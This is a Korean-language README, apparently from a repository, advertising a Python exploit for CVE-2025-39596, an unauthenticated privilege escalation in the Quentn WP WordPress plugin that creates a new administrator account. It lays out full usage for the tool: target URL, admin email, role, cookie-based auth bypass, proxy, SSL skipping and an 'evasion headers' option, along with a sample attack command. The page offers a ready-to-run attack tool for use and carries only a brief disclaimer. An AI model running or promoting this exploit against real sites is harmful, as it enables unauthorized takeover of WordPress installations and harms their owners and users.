
Quentn WP <= 1.2.8 - 인증되지 않은 권한 상승
Quentn WP <= 1.2.8 - 인증되지 않은 권한 상승
Quentn WP WordPress 플러그인은 버전 1.2.8까지 모든 버전에서 권한 상승 취약점에 노출됩니다. 이로 인해 인증되지 않은 공격자가 자신의 권한을 관리자 수준으로 상승시킬 수 있습니다.
CVE-2025-395969.8 (심각)이 저장소에는 CVE-2025-39596에 대한 Python 익스플로잇이 포함되어 있으며, 제작된 API 요청을 통해 인증 없이 새로운 WordPress 관리자 사용자를 생성할 수 있습니다.
기능:
python3 CVE-2025-39596.py -u <대상_URL> -e <이메일> [옵션]
필수 인수:
-u, --url 대상 WordPress 사이트 URL (예: http://127.0.0.1/wordpress)-e, --email 새 관리자 계정의 이메일선택적 인수:
-f, --fname 이름 (기본값: Pwn)-l, --lname 성 (기본값: Admin)-r, --role 할당할 역할 (기본값: administrator)-k, --key 알고 있는 경우 Quentn API 키--cookie 가능한 경우 인증 우회를 위한 쿠키--proxy 프록시 지원 (예: http://127.0.0.1:8080)--skip-ssl SSL 검증 건너뛰기--extra 추가 회피 헤더 활성화예시:
python3 CVE-2025-39596.py -u http://target.com/wordpress -e [email protected] --fname Root --lname User --proxy http://127.0.0.1:8080 --extra
Exploit Success By | Nxploited이 도구는 교육 및 승인된 보안 테스트 목적으로만 제공됩니다.
오용은 엄격히 금지됩니다.
저자는 이 코드로 인한 손해나 오용에 대해 책임을 지지 않습니다.
작성자: Nxploited (Khaled Alenazi)